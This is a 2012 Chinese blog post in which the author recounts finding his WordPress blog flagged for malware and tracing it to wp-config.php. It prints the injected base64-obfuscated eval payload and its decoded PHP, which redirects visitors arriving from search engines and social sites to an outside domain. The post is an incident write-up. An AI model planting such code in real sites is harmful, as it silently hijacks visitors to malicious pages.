Tanky WooRSS

博客被挂马了

24 Feb 2012
这篇博客是从旧博客 WordPress 迁移过来,内容可能存在转换异常。

首先感谢党,感谢人民,感谢给我挂马的人。

晚上打开博客,Chrome提示这个:

悲剧1

好吧,我被挂马了,提示有恶意软件,点击安全诊断页面链接后,接着在谷歌站长工具那各种查,说我是2.23号检测到恶意软件,于是我打开FTP,检查博客程序,查看2.23号被修改过的。结果没有,我又看24号被修改过的,只有.htaccess和sitemap.xml,检查过也没错。

orz,然后继续百度,各种查,把主题啥的都下载了检查,专门正对iframe, js等做了详细检查,发现还是找不出错误。

这时,我把Google报毒那里提示有毒的网站丢谷歌里搜索了下,开了几十个网站,突然找到了这个博客。感谢这位兄弟,否则我还没想到wp-config.php会被挂马。

打开wp-config.php,果然一大段醒目的eval代码。如下:

> > eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKC > > > > EkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9 > > > > TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyK > > > > CRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyK > > > > CRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzd > > > > HIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0 > > > > cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIH > > > > N0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVw > > > > b24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlci > > > > widGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw > > > > /KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cm > > > > wvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKC > > > > RyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpI > > > > HsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW > > > > 51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQple > > > > Gl0KCk7DQp9DQp9DQp9DQp9")); > > > >

经过解密后:

> > error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://froling.bee.pl/"); exit(); } } } } > >

果然就看到这个醒目的网站, fuck the website!

最后,我查看了一下我的wp-config.php的修改时间,是2.14号,也就是说早就被挂马了,只是谷歌放检测到!!!!

于是我又检查了我同一个虚拟主机下的另外一个博客,悲剧的是,在更早之前,1.30号就被挂过了。。。。

在解决这个问题的过程中,查了很多网站,总结一下:

http://www.zhanggang.net/wap/index-wap2.php?p=40250

http://www.stopbadware.org/home/security